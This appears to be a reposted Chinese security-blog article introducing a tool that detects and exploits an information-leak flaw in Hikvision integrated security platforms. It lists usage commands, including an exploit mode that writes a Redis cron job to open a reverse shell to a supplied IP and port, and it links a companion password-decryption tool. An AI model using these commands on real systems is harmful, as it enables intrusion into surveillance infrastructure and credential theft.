海康威视综合安防信息泄漏检测利用工具

admin
admin
admin
138674
文章
114
评论
2023年11月2日17:42:21评论328 views字数 610阅读2分2秒阅读模式
海康威视综合安防信息泄露检测利用工具
点击原文链接进行下载,点击原文链接进行下载,点击原文链接进行下载,点击原文链接进行下载,点击原文链接进行下载,点击原文链接进行下载,点击原文链接进行下载,点击原文链接进行下载
简介
该工具用于海康威视信息泄露漏洞的检测,若目标redis对外开放可结合redis写入计划任务反弹shell。
!!!!!!!!!!!!!!!!!!!!注意!!!!!!!!!!!!!!!!!!!!
1.本工具只做学习交流用,代码开源,请勿用做违法用途。
2.本工具的利用模块需要结合海康密码解密工具
https://github.com/wafinfo/Hikvision
使用
  1. 参数
    -c check is vuln(default) //检测模式
    -e reverse a shell  //利用模式
    -p string reverse port  //反弹端口
    -r string reverse ip  //反弹IP地址
    -u string target url  //目标url
  2. 检测
    ./Hikvision_Info_Leak -c -u http://xxxx.xx.xxx.xx
  3. 利用
    ./Hikvision_Info_Leak -e -u http://xxxx.xx.xxx.xx -r x.x.x.x -p 18080
    r参数为反弹IP的IP地址
    p参数为反弹端口参数
    以上两个参数在利用模式下都必须提供。


原文始发于微信公众号(Xsafe):海康威视综合安防信息泄漏检测利用工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月2日17:42:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   海康威视综合安防信息泄漏检测利用工具https://cn-sec.com/archives/2168757.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息